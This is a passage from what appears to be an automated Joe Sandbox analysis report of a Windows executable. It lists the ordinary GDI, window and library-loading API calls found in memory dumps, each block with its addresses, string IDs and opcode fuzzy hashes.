                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                    • API String ID: 47109696-2530820420
                                                                                                    • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                    • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                    • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                    • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                    APIs
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                    • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$Delete$Stretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 1458357782-0
                                                                                                    • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                    • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                                    • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                    • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00495519
                                                                                                      • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                                    • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                                    Strings
                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                    • API String ID: 2948443157-222967699
                                                                                                    • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                    • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                                    • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                    • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32 ref: 004233AF
                                                                                                    • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                                    • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                                    • SetCursor.USER32(00000000), ref: 00423413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1770779139-0
                                                                                                    • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                    • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                                    • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                    • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                    • API String ID: 667068680-2254406584
                                                                                                    • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                    • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                                    • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                    • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                                    • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                                    • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                    • API String ID: 190572456-212574377
                                                                                                    • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                    • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                                    • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                    • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                                    • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                                      • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                      • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                      • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                    • API String ID: 142928637-2676053874
                                                                                                    • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                    • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                                    • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                    • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                                    • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                    • API String ID: 2238633743-1050967733
                                                                                                    • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                    • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                                    • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                    • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                    • API String ID: 667068680-222143506
                                                                                                    • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                    • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                    • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                    • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                    APIs
                                                                                                    • GetFocus.USER32 ref: 0041B57E
                                                                                                    • GetDC.USER32(?), ref: 0041B58A
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2502006586-0
                                                                                                    • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                    • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                                    • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                    • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                    • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                    • API String ID: 1452528299-1580325520
                                                                                                    • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                    • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                                    • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                    • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                                    • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceMetricsSystem$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 447804332-0
                                                                                                    • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                    • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                                    • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                    • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                    • LocalFree.KERNEL32(0078E4D0,00000000,00401B68), ref: 00401ACF
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,0078E4D0,00000000,00401B68), ref: 00401AEE
                                                                                                    • LocalFree.KERNEL32(0078F4D0,?,00000000,00008000,0078E4D0,00000000,00401B68), ref: 00401B2D
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                    • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3782394904-0
                                                                                                    • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                    • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                    • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                    • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$Show
                                                                                                    • String ID:
                                                                                                    • API String ID: 3609083571-0
                                                                                                    • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                    • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                                    • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                    • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                                    • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                                    • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                                      • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
